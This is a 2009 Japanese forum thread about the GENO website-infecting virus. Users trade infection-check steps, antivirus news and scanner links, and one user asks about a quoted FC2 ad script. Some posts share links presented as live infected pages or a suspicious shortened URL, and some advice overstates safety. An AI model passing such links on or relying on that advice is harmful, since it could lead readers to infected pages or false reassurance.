レジストリエディタが起動した所で何度もWindowsのセキュリティ警告がポップアップし出して
止まらなくなったのでPC強制終了して再起動

再起動後にとりあえずwikiの感染チェックをした所大丈夫っぽかったんだけども
本当に大丈夫なんだろうか…同じような動作した方はいらっしゃいますか
ブラウザはfirefoxで、NoScript導入済の状態で閲覧中でした
142GENO:2009/05/17(日) 16:18:44 ID:g/3rLrfQ0
みみみみ、みんなも、も、ももちもちつけけけ!
143geno:2009/05/17(日) 16:18:48 ID:BKeJE78R0
せめてサーバ上のHTMLファイル改竄のルートが判明できればなあ
拡散を止めるのに今取れる対策はFTPのパスワード変更くらい
144geno:2009/05/17(日) 16:18:48 ID:0tAEYsh+0
「JAVAスクリプト切ったら見れないサイトがあるからイヤなんだけどやっぱり切らないとダメなの?」
も心底うざいからやめてほしい
自分で判断できないことを他人に偉そうに訊かないでくれ
145 :2009/05/17(日) 16:19:08 ID:CG6fmaxh0
>>140
お前はそのうちのどれ?
146geno:2009/05/17(日) 16:19:54 ID:F1Qs+jzz0
一応貼っとく
http://tinyurl.com/rcxpy7
147GENO:2009/05/17(日) 16:20:02 ID:LhyaRdys0
Avastも完璧じゃないけどね
FlashPlayerのインストーラの偽者、Avastの5/13版では認識できなかった模様。
GENOで突っ込まれるexeのニューバージョンも、Avast5/15版で認識できてない模様。
(今は対応済みかもしれないけれども)

…とはいえ、この辺のテストって成功率15%とかだから、
これらのことからAvastが糞だとかいうわけでは全然ない。
148geno:2009/05/17(日) 16:20:13 ID:+7vbbFoa0
感染してたからサイト削除しようとしたんだが
エラーになって消せないぞおおお
なんか書き換えられたっぽい?ガクフル
149GENO:2009/05/17(日) 16:20:17 ID:94GIamPZ0
>>142
おぉまえももちつけぇぇい!
150GENO:2009/05/17(日) 16:20:30 ID:So65kBMO0
>>138
対策の仕方がよくわからなくて
かつ感染していないなら、それが一番いいよな
151GENO:2009/05/17(日) 16:20:33 ID:OMRGA0Ne0
>>142
お前が一番もちけつw
152geno:2009/05/17(日) 16:22:19 ID:BKeJE78R0
>>148
パーミッション変更もできないのか?
153名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 16:22:47 ID:S0k/XHY70
おまえらもちつけ。
おやつのバウムクーヘンでも食え。つ○

ところでノートンの更新がキタっぽいな。
これとは関係ないかも試しれんが報告だけでも。
154GENO:2009/05/17(日) 16:23:11 ID:c1tROZwb0
今回Avastが早かっただけ
155GENO:2009/05/17(日) 16:23:21 ID:1mIw8Ych0
ZERO使ってたけど乗り換えるかなー
ノートン先生、昔は重かったけど、少しは軽くなった?
156GENO:2009/05/17(日) 16:23:42 ID:pCkMJ7qx0
>>131
まとめのよくある質問に
Q.「どうすれば安心なの?」
A.「亜種も出てきているようなので現在は対策を施していたとしても安心できません。
  セキリュティソフトの対応を待ち、同人サイト巡り等は控えるようにしましょう。」

ってなかったもん!
157GENO:2009/05/17(日) 16:24:08 ID:2i7uqEoy0
146
なんで短くしてるの
158げの:2009/05/17(日) 16:24:34 ID:KFLP4Q6J0
さっきから安価ミス大杉じゃね?
159GENO:2009/05/17(日) 16:25:06 ID:PBysmEaBO
ノーパソ使いで、サイトのデータは全部外付けHDに
保存してるんだけど、この場合も感染した場合、
データは全部消去しなくちゃなの?
160GENO:2009/05/17(日) 16:25:09 ID:LhyaRdys0
>>146
58byteのmidiファイル偽装乙
…いや、本当にmidiかもしれないけど、確認する気は無い。
161GENO:2009/05/17(日) 16:25:09 ID:So65kBMO0
ID:pCkMJ7qx0
こどもか
162GENO:2009/05/17(日) 16:25:40 ID:NLzHVxwd0
亜種亜種亜種亜種亜種亜種亜種亜種うるせーーーーーよバカども!

GENOウイルスに関してはflashとreaderを最新にしてれば対策完了。
それ以上何もしなくていい。

亜種が出るから恐いとか言ってたら一生ネット繋げないだろ。
新しいウイルスなんて年中生まれてるのに今更何言ってるんだか。
163GENO:2009/05/17(日) 16:26:29 ID:2i7uqEoy0
>>160
d
Twitterももう踏めないとこ多いね
164GENO:2009/05/17(日) 16:26:38 ID:7TapFnnMO
こうなってみると、サイトに糞重いFlash使ったり
Java切ると満足に入室閲覧もできないような人に優しくないサイトがいかに多
かったかよくわかるな
165geno:2009/05/17(日) 16:26:45 ID:+7vbbFoa0
>>152
さっきまで変更できてたのに

今は
ソフト起動(すごく重い)→フリーズ→仕方ないから待つ→まだフリーズ→仕方ないからタスマネで強制終了
の繰り返し

動かない・・・
166GENO:2009/05/17(日) 16:26:45 ID:B/lYlGwY0
まとめWikiからWindowsUpdateいったんだが

エラー番号: 0x8DDD0007
プログラムまたは更新プログラムのインストールを完了するには、コンピュータを再起動する必要があります。再起動するまで、このサイトから他の更新プログラムを表示したり入手することはできません。

って出てUpdateできんのだけどこれアウト?
ちなみに再起動はした
167GENO:2009/05/17(日) 16:26:46 ID:94GIamPZ0
亜種亜種うっさいのが嫌なら見なきゃ以下略
168GENO:2009/05/17(日) 16:27:05 ID:RNqd4lsF0
安心と安全は別ものだぜ?
科学的に安全とされている食品だって、
その人が気にしーな人だったら、安心とは言えんだろ?
169名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 16:27:12 ID:Z++oR+bB0
>>162
おまいがうるせーよ
170GENO:2009/05/17(日) 16:27:15 ID:Mk4tVeWS0
つぃったーやったことないんでよくわからんのだが、あれもヤバげなの?
171GENO:2009/05/17(日) 16:28:19 ID:CHdzkRA+0
同人サイト見なきゃ感染もしない
感染してるウイルスサイトのリストはまだか、ブロックするから教えろ
172GENO:2009/05/17(日) 16:28:36 ID:2i7uqEoy0
>>170
短縮URL張られると確認できない人もいる
自分もそう
173GE:2009/05/17(日) 16:28:54 ID:gL3wqKiX0
174GENO:2009/05/17(日) 16:28:59 ID:Qk4iTuLX0
わからない人向けまとめの中の人見てる?
トップとメニューの編集権限変わってないようなんで、
状況が状況だし管理者のみにしといた方がいいかと

何はともあれ乙!特大しょうゆ豆に思いきり吹いたw
175genogeno:2009/05/17(日) 16:29:15 ID:0tAEYsh+0
>>156
まったく同意見だよ
ついでにjavaスクリプトも切りたくないそうだからこうしよう

よくある質問
Q.「じゃあ、どうすれば安心なの?」
A.「亜種も出てきているようなので現在は対策を施していたとしても安心できません。
  セキリュティソフトの対応を待ち、同人サイト巡り等は控えるようにしましょう。」

Q.「○○○はしたくないんだけど…絶対にしないとだめ?」
A.「自分で判断してください」

Q.「今こうでこうでこうなんだけど、安心かなあ?」
A.「自分で判断してください」
176GENO:2009/05/17(日) 16:29:45 ID:8CXhjAcE0
>>171
なんでそんなに上から目線なの?自分で調べる気はないの?
まとめサイト見る気はないの?馬鹿なの?死ぬの?
177GENO:2009/05/17(日) 16:29:53 ID:nyEd19m/P
ていうかここまで対処法が確立してる状況で、ここで質問するってことはバカ率高い
んだからバカな質問が増えるのはある程度仕方ないんではないかと。
バカじゃない奴はまとめサイト読んで一人で対処できる。それでも分からない部分で
質問するってのはあるだろうけどその人数は自ずと絞られるわけで、数的に
クソバカな質問>>>>バカな質問>>(超えられない壁)>>まともな質問
になって当たり前だわな。文句言うだけ無駄ってもんじゃね?
178 :2009/05/17(日) 16:30:01 ID:CG6fmaxh0
>>171
成美堂出版
179名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 16:30:06 ID:NLzHVxwd0
>>171
ここのバカな同人連中が騒いでるから
同人サイトだけ感染しているように見えるだけで、
実際はのべつくまなしに感染してるだろ。
リストなんて全く何の意味もない。まとめサイトのリストも消せよ。意味ねーから。
flashとreader更新すればもうどのサイト見ようが感染しねーから。
180geno:2009/05/17(日) 16:30:13 ID:F3VlOqPh0
この記述がいつからあったのか分からんのだけど
幸のトップに「ウイルス感染の報告があった」って
書いてあるとこがあるのはgenoなんだろうか
181GENO:2009/05/17(日) 16:30:13 ID:mw7PFJNB0
javascriptやActivX切ったら見れないようなサイトは元々見に行かないや
同人サイトって絵を見たいだけだから、変に凝られても邪魔で読み込むのにうざいだけなんだよね
182二次裏が感染したってガチっぽい:2009/05/17(日) 16:30:17 ID:Ho2150cH0

956 :名無しさん@お腹いっぱい。:2009/05/17(日) 14:05:23
二次裏が感染したのはガチ

「エンジェル戦記 GetMoney」でググればわかるが
顔文字ブログの管理人が作成したって噂もあるくらいだからな

975 :二次裏が感染したソース:2009/05/17(日) 14:16:43
>>956
二次裏仕掛けた人っぽいブログ
http://ruhuraro.blog57.fc2.com/blog-entry-138.html


ちなみにこのブログはウィルスではない。
ここの管理人がDDOってネットゲームやってるんだが、そこの会員コミュニティでGENOウィルスのURLを配布してる。
今もそのコミュは削除されずに残ってる模様。ちなみにコミュは無料トライアルとかいうのを登録しないと見れない。


このブログの管理人が関係してるのかは知らないけど
二次裏が前に攻撃されたとき、この管理人がやってるギルドのコミュで二次裏襲撃計画みたいな書き込みがされていた

978 :名無しさん@お腹いっぱい。:2009/05/17(日) 14:19:27
>>975
そのブログはかなり有名w
例の無料トライアルってコミュはゲーマーの間じゃチートとか升ツール配布の裏コミュになってるw

俺もメイプルやってるとき入ってたわw
183GENO:2009/05/17(日) 16:30:32 ID:yytTYj0c0
>>164
同人は防犯対策?にいろいろやってるとこ多い
184GENO:2009/05/17(日) 16:31:10 ID:nyEd19m/P
>>179
烏骨鶏のサイトとかまで感染してるもんなあ。
185GENO?:2009/05/17(日) 16:31:40 ID:nKCItkyM0
ご参考までに私の経験談を

当該PCはCPU、Celeronでメモリ積んで500MBというしょぼい安物で
ある日検索してとあるFC2ブログの書評を見ていてリンク踏んだところ
なんでか○○○コ・ママという聞いたことのある結構有名なエロサイト
おいおい、記念にどれか見てやるかーとあるサンプル踏んだところ
メディアプレイヤーが真っ黒になってガタガタと画面が揺れる
それで本体がガッと音を立てた、こりゃやばいと閉じたらセーフモード
のような大画面に変化
再起動してみたら、立ち上がったけど「……深刻な状態から回復しました」
との窓がでました
だけどここから時々CPU100パーセントがずっと続きさすがにこれは
ウィルスじゃないかとパソコン会社の人に新しいものを頼んでおいて
その間様子みていると相変わらずタスクマネージャーで見ると
100パーセント状態維持

それから暫くしてマザーボードお逝きになり立ち上がりもしなくなりました



これが4月始めから中盤頃の話で、その時はウィルスチェックやってもらったけど
出てこなくてパソコン会社の人も首捻っていたけどもしかしたらこのウィルス
だったのかなーと
186geno:2009/05/17(日) 16:32:07 ID:8M+K/x8d0
>>171
そんなもんあげてたら糞のようにレスがかさんで重要なレスが埋もれて
このスレの価値が今以上に下がるだろ
馬鹿か?
187GENO:2009/05/17(日) 16:32:16 ID:3q/QE8VM0
>>171
同人御用達のレン鯖のURLを全ブロックしとけ
忍者、fc2、さくら、ロリポとか
188GENO:2009/05/17(日) 16:32:23 ID:c1tROZwb0
>>171
検体共有したいのに ファイル消して終了の奴は困るよな

リストアップまだかよ
こんなときだけ律儀にガイドライン守ってるんじゃねー
189GENO:2009/05/17(日) 16:32:27 ID:ksg3AVup0
>>183
同人で防犯って何だよ
自意識過剰すぎるだろ
190感染サイトのURLまとめ:2009/05/17(日) 16:32:40 ID:gcC3WiMr0

GENO感染URLのまとめサイト作ろうと思うんだが
誰か感染URL知ってる限り貼ってくれるとありがたい

191GENO:2009/05/17(日) 16:33:19 ID:So65kBMO0
>>164
画像直リンとか転載対策でやってるところもあるから
大目に見てやってくれ
192gn:2009/05/17(日) 16:33:42 ID:b4t5UBFOO
>>190
プギャーw
193GENO:2009/05/17(日) 16:33:54 ID:GEQ8HxWY0
一日PC開けなかったらスレ大変なことになってんな
消費早すぎて追いつけないwwwww

しかしこれいい加減ニュースにしていいだろ
新型インフルも怖いがこっちもそれなりにやばいんじゃないのか
194名無しさん@お腹いっぱい。:2009/05/17(日) 16:33:54 ID:cYMsGTrD0
>>190
セキュ板に帰れ
195GENO:2009/05/17(日) 16:34:24 ID:Fhwprm6k0
イラストの転載対策とかだろ
196GENO:2009/05/17(日) 16:34:34 ID:nyEd19m/P
>>189
イラストを直リンクして呼び出しまくる奴が大量にいて転送量かさんで鯖に
怒られるとか、色々あるんだよ。
197GENO:2009/05/17(日) 16:35:08 ID:yytTYj0c0
>>189
無駄だし見辛いなーとは思うけどな
198GENO:2009/05/17(日) 16:35:09 ID:c1tROZwb0
>>194
お前らが2次感染引き起こしてるんだよカス
自分だけ対策してんじゃねー
199gg:2009/05/17(日) 16:35:55 ID:CHdzkRA+0
>>190
俺は面倒でやらなかったけど
チェックサイトがあるから
そこに同人系リンクのURLを片っぱしから入れていくのがいいかも
サイト作るなら協力するぞ、感染ジャンルとか書かれても糞の役にも立たん
200名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 16:36:08 ID:S0k/XHY70
個人サイトとかはだめかもしれんけど公式サイトとかはURL貼った方がいいんじゃないかな
201GENO:2009/05/17(日) 16:36:31 ID:80ltjoJs0
手順イラストとかでなんか必要なのある?
なんかぐずぐずサイト持ちようの手順描いてたら
文章だけですごくわかりやすいwikiできたしもうよさそうだ

ほんとにわからない人用wiki
ttp://www40.atwiki.jp/gegegeno/pages/1.html
有志による現段階でのURLチェッカー
ttp://geno.2ch.tc/
同人サイト向け・通称「GENOウイルス」対策まとめ
http://www31.atwiki.jp/doujin_vinfo/

●まずは何をしたらいいの?

1、自分が感染しているか確認
ttp://www31.atwiki.jp/doujin_vinfo/pages/12.html

2、自分のサイトが感染しているか確認
ttp://www31.atwiki.jp/doujin_vinfo/pages/16.html

3、閲覧先が感染しているか不安。
→対策しつつソフトやソースチェッカーなどで確認してください
それでも亜種だの新種だの、アレ感染してたら〜とどんどん
不安な想像が止まらないならネットを休む!
202GENO:2009/05/17(日) 16:36:34 ID:Tql3Nv1q0
<script type="text/javascript"><!--
var fhp_c_pc = navigator.userAgent.toLowerCase();
var fhp_ie = ((fhp_c_pc.indexOf("msie") != -1) && (fhp_c_pc.indexOf("opera") == -1));
var fhp_cs, fhp_wt, fhp_dm;

if (fhp_ie) {
fhp_cs = document.charset;
}else{
fhp_cs = document.characterSet;
}
fhp_dm = document.location;

fhp_wt = "";
fhp_wt = '<' + 'script src="http://web.fc2.com/footer/footer.php?cs=' + fhp_cs + '&dm=' + fhp_dm + '"><' + '/script>';
document.write(fhp_wt);
//--></script>


…こんなタグが自分のサイトに勝手に打ち込まれていました。
一応サイトは消しましたがこれってウイルス感染してますかね?
初心者ですいません。
203GENO:2009/05/17(日) 16:37:00 ID:+sIlCkiL0
poo oekakibbsの広告が消えてるのはなぜ
204感染サイトのURLまとめ:2009/05/17(日) 16:37:06 ID:dNBS0rND0


ぶっちゃけウィルス保管場所ほしい人いるでしょ?
俺の場合対策用じゃなくてウィルスURLの保管庫として作りたいんだよね


同じこと考えてる人いたらGENOウィルスURLの支援よろ^^
とりあえず私からw
ttp://geocities.com/dirkbridges77/tustin-15-theater.html
205GN:2009/05/17(日) 16:37:31 ID:Sl268vQ3O
同人サイトで此処のURL貼ってるとこ出てきたよな
206GENO:2009/05/17(日) 16:37:43 ID:3q/QE8VM0
>>202
それは広告です
207GENO:2009/05/17(日) 16:38:33 ID:JgYHTftB0
>>202
うん、自分の使ってるサーバの規約読んでもそう思うなら
とっととサイト削除してクリーンインストールすればいいよ
208geno:2009/05/17(日) 16:38:33 ID:U/BebqKb0
>>202
違うと思う
209GENO:2009/05/17(日) 16:39:00 ID:28MNX8DRO
>>202
それはサーバー側の広告です
まとめ見ましょう
210geno:2009/05/17(日) 16:39:19 ID:8M+K/x8d0
リスト作りたいんなら自分らでスレ立てしろよ
間借りするな
211ジーノ:2009/05/17(日) 16:39:20 ID:en3OEJg6O
URLURLいってる奴は前スレでも見てこい
このスレに限ってはローカルルールがどうこうで貼るのが禁止されてるんじゃねーよ

何回言わせるんだボケ
212GENO:2009/05/17(日) 16:39:40 ID:29tYhPU70
>>189
防犯対策は必須。それは常識。

だが転載対策には.htaccess使うのが常識
JavaScriptじゃなくてな
213GENO:2009/05/17(日) 16:39:42 ID:Clpl9MCg0
今頃になって広告のスクリプトで「ウィルスかも〜><」って今まで何見て来たんだよ…
214GENO:2009/05/17(日) 16:39:42 ID:AIHCMWTk0
>>204
やるなら専用スレ立ててやったほうが良いんじゃないの
215GENO:2009/05/17(日) 16:39:51 ID:CSU66a7c0
>>199
要はセキュ板の人は感染サイトのコードの検体が欲しいんだろうけどなあ…
でも同人板はこの通り、ドのつく初心者がゴロゴロ転がってる板だから、ここでURL
晒すと想像の斜め上の反応するバカが続出するのが悩ましい。

>>202
どう見ても公告…
216GENO:2009/05/17(日) 16:39:53 ID:9LeFd5x0O
ニフティのオンラインスキャン全部にチェック入れてやってみてるんだが
すごいじわじわとスキャンされるんだな…
「スキャンしたファイル」の数が止まって何分か経ったりするし
やっぱ混み合ってるんだろうか…これ何分くらいかかるものなんだ?
217GENO:2009/05/17(日) 16:40:21 ID:OMRGA0Ne0
初心者、機械オンチだからはもうやめてくれ
218:2009/05/17(日) 16:40:33 ID:uCG8VfosO
感染してないのにはやまってサイト消すなよ
219GE:2009/05/17(日) 16:40:35 ID:e/Js+NWjO
ニフティのオンラインスキャンを試したんだけど、ロックされてるって出る。
管理者としてアクセスしてるし、ロックしたような覚えも無い。

同人サイト向けの感染確認手順(XP)を踏んでみても、コマンドプロンストもレジストリエディタも立ち上がるけど、
最後の手順で『指定されたパスが見つかりません』て出る。
ちなみに半日前にチェックしたら、正常なファイルサイズが出た。

これってアウトかな?
サイト更新はここ2ヶ月はやってない。


220GENO:2009/05/17(日) 16:40:59 ID:Tql3Nv1q0
>>206
ご親切にありがとうございます。
広告だったのか…よかった…
221 :2009/05/17(日) 16:41:10 ID:cYMsGTrD0
>>216
始まってしまえば混雑は一切関係ない
222GEO:2009/05/17(日) 16:41:21 ID:+fOIVdWz0

>ぶっちゃけウィルス保管場所ほしい人いるでしょ?


GENOウィルスのURL付きまとめなら>>182のトライアルコミュですでに存在するぞ
観覧するにはゲームの会員登録が必要だけど無料だからやってみれば

つかあのブログの管理人が沢山URL撒いてるぞ
そのせいで私怨で人に踏ませる奴がトライアルコミュに集結してやがる
223GENO:2009/05/17(日) 16:41:42 ID:CSU66a7c0
>>216
ニフティのはやったことないけど、普通オンラインスキャンは1時間以上はかかる
もんだと思った方がいい…と思う。マシンパワーにもよると思うけど。
224名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 16:42:36 ID:QRoiCEGS0
うちのサイトのソース見たけど大丈夫みたい
思いっきり単純な作りにしておいてよかったわ
225GENO:2009/05/17(日) 16:43:00 ID:0di56Z1w0
http://geno.2ch.tc/

同人サイト怖くて見れないならここにURL入れて確認すればおk
226名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 16:43:07 ID:w1jzXhLa0
>>216
セキュリティソフトくらい常駐させろよ
227GENO:2009/05/17(日) 16:43:40 ID:I+BvoMFMO
サイトのアクセスに携帯が増えてきた。警告が広まってきたってことかな。
228GENO:2009/05/17(日) 16:43:44 ID:AIHCMWTk0
>>222
京都府警のなんとかに通報しておけば良いと思うよ
229geno:2009/05/17(日) 16:43:49 ID:YTQWI9820
URL貼ろうとしてる人へ
過去スレでこういうことだからURLは貼れないってことになったんだが
過去スレ読んだか?
--引用--

感染URLを書くと踏むバカが大量にいる

あと、板住人に
関係のない未感染サイトを晒し目的で貼り付けるバカがいる

という訳でURLは貼れない
----
頼むから、広告をウィルスですか?とか言っちゃうような人のいるここでは止めて欲しいんだぜ
230 :2009/05/17(日) 16:43:55 ID:cYMsGTrD0
>>224
見やすくてって意味か?
231GENO:2009/05/17(日) 16:44:50 ID:kxOBL6Wi0
まあなんだ。
どうしても不安ならvista買えという世界一の金持ちのお告げだな。
232名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 16:44:52 ID:NV1jV/fZP
GENOウィルスは自動アップデート機能付きアプリケーションなので、
いま書かれている対策や確認方法は既に通用しなくなっている可能性があります。

まずはセキュリティソフトが無効化されてないかチェック
http://www.trendmicro.co.jp/download/test-virus.asp(テスト用ウィルス・無害)
トレンドマイクロ社のサイトなので安心です。
もしセキュリティソフトが反応しなかったら、確実になにかに感染しています。

オンラインスキャンで確認・駆除しましょう。

トレンドフレックスオンライン(ウィルスバスター)
http://www.trendflexsecurity.jp/free_security_tools/housecall_free_scan.php#

ニフティオンラインスキャン(カスペルスキーエンジン)
http://www.nifty.com/security/vcheck/

それでもセキュリティ状態に不安が残る、対策するスキルを持たない方は、
思い切ってOSをクリーンインストールするのが確実です。
233GENO:2009/05/17(日) 16:45:33 ID:oZ1trJyb0
>>219
> 最後の手順で『指定されたパスが見つかりません』て出る。

これ、何をやって出たんですか?sqlsodbc.chm?
234GENO:2009/05/17(日) 16:45:37 ID:9LeFd5x0O
>>226
だってノートン先生眠ってるし
235geno:2009/05/17(日) 16:46:04 ID:xYIJLaYL0
>>230
ソースに変な構文が打ち込まれていたら一目で解る、からでは
236GENO:2009/05/17(日) 16:46:15 ID:4M1l0+yy0
>>190
ここだとファびょるんだよな でも検体は欲しい

ヲチかインターネット・セキュリティ関連の板に
感染したHPを無差別にひたすら晒していくそういう専用スレ立てて欲しい
237geno:2009/05/17(日) 16:46:15 ID:Ph1p2hcP0
>>225の結果を見て勝手に感染認定しないように。
はっきり判定するなら>>28の方法で
238GENO:2009/05/17(日) 16:46:25 ID:8BxiMwcD0
>>231
つまり、ゲイツによる陰謀だったんだよ!
239GENO:2009/05/17(日) 16:47:47 ID:47NU7D+E0
な、なんだって!
240GENO:2009/05/17(日) 16:47:54 ID:CSU66a7c0
>>236
もしなんだったら、すでに名前の挙がってる同人系のジャンルサーチ爆撃しまくって
みたらどうかな?…って手間かかるよなあ…ごめん。
241GENO:2009/05/17(日) 16:47:59 ID:aRPChaoi0
自分FFFTPを使ってるんだけど、
削除したファイルAと同じファイル名で、別内容のファイルBをうpした時、
ファイルAの内容が復活したことがある
もしサイトを再構築するならファイル名も変えた方がいいんじゃない?
ビルダーとか使ってる人はソース何それブルドッグ?が多いんだよなあ…
242GENO:2009/05/17(日) 16:47:59 ID:M0g/u/hwO
画面ブルーになって再起動する
動作がすっごく重い固まる
49.5キロバイトのやつとコマンド・レジストリは大丈夫

なんだけど、何かに感染したのかな?
243GENO:2009/05/17(日) 16:48:39 ID:2A9nrUfJ0
>>190>>199>>215
こっちに有志を誘導してみては?

【同人限定】GENOウイルス感染サイトヲチスレ
ttp://pc11.2ch.net/test/read.cgi/net/1242526238/
244Geno:2009/05/17(日) 16:49:28 ID:UOLDvSOuO
サイト削除って鯖ごとじゃなくて鯖内のファイルだけでいいんですよね?
クリーンインスコしてパスワードも変えたあとはサイト更新しても大丈夫でしょうか?
245GENO:2009/05/17(日) 16:49:35 ID:gOW3BF2t0
>>1
前スレでINDEXだけ改竄の痕跡見当たらなかったって書き込んだ者だけど
改めて見たらINDEX含めもれなく改竄されてた。申し訳ない

もしあの書き込みでまとめに文章追加してくれたんなら削除お願いします
INDEXだけ調べて安心しないように…という注意喚起になっていいって場合はおまかせします
246GENO:2009/05/17(日) 16:49:36 ID:Z5X0Hzy/0
>>240
サーチがいくつも立ってるところもあるだろうが
サーチが感染しているところだったら探しやすいと思う
既に削除しているところもあると思うが…

なんだったらボカロなんかまだ対策進んでないところ多いんじゃないか
247GENO:2009/05/17(日) 16:49:40 ID:p6pp9GJl0
>>236
つ 成美堂
248GENO:2009/05/17(日) 16:49:57 ID:CHdzkRA+0
>>243
なんだ、丁度いいスレがあるじゃないか
発見次第ここに有害サイトを晒す事にしよう
249GENO:2009/05/17(日) 16:50:39 ID:AIHCMWTk0
>>236
それがいい、ここではしないほうが得策
特に反応仮名依存微細とはタシロ砲で落とすしかないところも有るだろう
ちゃんと本格的に対策を進めたほうが良いかもね
250geno:2009/05/17(日) 16:50:43 ID:/3OwKYN30
>>236
自分で立ててすればいいじゃない
それからここで誘導なり何なりすれば?
貼りたいと思ってる奴は貼りに行くだろ。
251GENO:2009/05/17(日) 16:51:00 ID:9p/NTHkP0
検体目的なら昨日出てた乙女ゲーの公式は?
もう対策済みなのか
252ジーノ:2009/05/17(日) 16:51:06 ID:en3OEJg6O
>>236
バカからの
・何の関係もないjsの入ったブログ
・jsすら仕込まれてない一般サイトの私怨晒し


しか集まらないから、同人系で検体集めるのは諦めろ
253geno:2009/05/17(日) 16:51:47 ID:BKeJE78R0
>>241
ファイル名を変えても意味無いよ
アップロードする時のログインパスワードを変更しないと
対策を取ったとは言えない
254geno:2009/05/17(日) 16:52:08 ID:TYMPcO5S0
■初歩的かつまとめすら見ていないようなアホな質問してるやつ
■感染URL貼れ貼れ言ってるやつ

これはもう釣りなんじゃないの
255GENO:2009/05/17(日) 16:53:44 ID:yenDHFuc0
>>254
URL貼れって言ってんのは、同人板に常駐してる私怨晒しじゃね?
256GENO:2009/05/17(日) 16:53:52 ID:94GIamPZ0
>>242
GENO以外のなにかに感染してる可能性はありそうだな…
ウィルスチェックしてみれ
257名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 16:54:12 ID:S0k/XHY70
>>251
ティアラとリボンは
チェッカー(http://geno.2ch.tc/)で調べた限りはまだ危ないね。
258GENO:2009/05/17(日) 16:54:31 ID:oRUCA7bt0
沈静化するまでFTP使わないほうがいいですよね
259GENO:2009/05/17(日) 16:55:09 ID:75zIIRdD0
>>253
ファイル名「も」ってことなんじゃね?

しかし見てて思ったんだが初心者はそもそも感染する仕組みもよくわかってないから
なんとなく感染サイトの画像とかでも感染するような気持ちになっちゃうのかな…
260GENO:2009/05/17(日) 16:55:11 ID:k6wUL/5k0
>>257
まだも何も
寺は何も対策してない
261geno:2009/05/17(日) 16:55:18 ID:NV1jV/fZP
同人板って初めて来たけど、
想像を超える情弱のすくつだなあ・・・
なんかほのぼのしたw
262GENO:2009/05/17(日) 16:55:40 ID:G3YUHFPn0
>>253
パスを変えた後の話じゃないか?
クリーンインスコした後パス変して、index.htmlをもう一回うpしようとしたとき
新しく作った(jsの仕込まれてない)ファイルをうpったつもりが
以前ウイルスの作った(jsの仕込まれた)ファイルをうpしたことになることがあるのでは?っていう話だと思ったが
263geno:2009/05/17(日) 16:56:26 ID:OhDQaHNv0
>>257
社員誰も気付いてないんじゃないか?
明日出社してビックリだな
264GENO:2009/05/17(日) 16:57:07 ID:oZ1trJyb0
質問の際、こんなひな形を用意するのはどうだろう?
迷惑かな?

【OS】XPとかvistaとか
【ブラウザ】IE7とかFirefox3.0.10とか
【ウィルスソフト】入れてない・入れていたら Norton・AVGとか
【質問事項】パソコンが重い等々
265GENO:2009/05/17(日) 16:57:47 ID:i0zuId6O0
>>225
うちのリンク先URLぶっこんでみたらほとんど0%だったんだけど
一つだけ400%のとこがあった
メモ帳でソース開いてみたら変なjavascript(eval入ってる)があってどうも黒っぽい
とりあえずリンク外した…管理人にどう伝えるか思案中。確かPC超初心者だったから
266GENO:2009/05/17(日) 16:58:01 ID:k6wUL/5k0
>>264
ここは質問用スレじゃないからそんなの要らん
267gn:2009/05/17(日) 16:58:01 ID:b4t5UBFOO
>>258
使いたかったら使いなよ
268GENO:2009/05/17(日) 16:58:07 ID:4M1l0+yy0
>>254-255
黙ってさっさとファイル消した結果として 今蔓延してんだろ
明日から月曜だから急いでるんだよ
269 :2009/05/17(日) 16:58:58 ID:Ph1p2hcP0
>>264
パソコンが重い
などには結局は「知らんがな」としか返せない
270GENO:2009/05/17(日) 16:59:01 ID:ksg3AVup0
>>264
前スレでそういうの作っても無駄じゃね的なことになってなかったけ?
271名前欄にスレ名入力推奨@自治スレ:2009/05/17(日) 16:59:05 ID:j1LrjPT00
>>264
何を質問する必要があるんだよ
272geno:2009/05/17(日) 16:59:07 ID:lGE677Mu0
>>261
住人でさえびっくりしている
273GENO:2009/05/17(日) 16:59:46 ID:uj1d73AxO
>>268
なぜ消してはいけなかったのか詳しく教えて下さい
274GENO:2009/05/17(日) 17:00:18 ID:7qHgWSGL0
>>268
どこの社員の肩書きを借りるつもりですか?
275242:2009/05/17(日) 17:00:35 ID:M0g/u/hwO
通常の起動出来なくてセーフモードでウイルスバスター2009したら何ともなかった
で、また通常起動したら速攻ブルーになる…
ネットも繋げない
276GENO:2009/05/17(日) 17:00:59 ID:75zIIRdD0
>>264
以前のスレでもそういう案出たんだけど

テンプレちゃんと読んでその形式に則って質問出来るような人は
まとめ読んでちゃんと理解出来る
→結果として質問する奴はそういうのにおかまいなし
なので使われることはないだろうという感じだった
277GE:2009/05/17(日) 17:01:46 ID:e/Js+NWjO
>>233
dir C\WINDOWS〜を入力する項目のところです。
検索でsqlsodbc.chmをいれたら、ファイルサイズ50KBで確認はできるんですが…。

278 :2009/05/17(日) 17:01:49 ID:Ph1p2hcP0
>>275
GENOウイルスかどうかは知りませんが何かにやられましたね
さようなら
279GENO:2009/05/17(日) 17:01:55 ID:yOFHE6O/O
Adobe製品を最新にってあるんだけどさ
そもそもAdobeReaderを入れて無いんだけど、これインストールしなきゃダメなの?
280GENO:2009/05/17(日) 17:02:07 ID:So65kBMO0
>>261
まだ、気にして質問するだけ
マシなんじゃないかと思うようになってきた
281GENO:2009/05/17(日) 17:03:08 ID:9p/NTHkP0
>>268
>>257とのことなので検体なら
リボンマジックまたはティアラモード公式サイトでいいのでは
282GENO:2009/05/17(日) 17:04:03 ID:8hFLiPK90
これ予防策としてAdobeReaderとFlash Player消すってのはアリ?
最新版アップデートがうまくいかないからめんどくさくなって両方アンインストールしたけど
騒ぎが落ち着いてからインストールし直した方がいいかな
283GENO:2009/05/17(日) 17:04:03 ID:oZ1trJyb0
すまそorz
284GENO:2009/05/17(日) 17:04:06 ID:94GIamPZ0
>>275
最近新しく何かをダウンロード+インストールしたとかはないか?
なんにせよなんかに感染してる可能性は高いと思う

余談だが俺中国製のMMORPGプレイしようとしたら
クライアントがいきなり強制終了してブルースクリーンなってかなりびびった記憶がある
285GENO:2009/05/17(日) 17:04:15 ID:So65kBMO0
>>279
入れてないなら入れなくていいよー
286geno:2009/05/17(日) 17:04:56 ID:9wncY9JGO
>>280
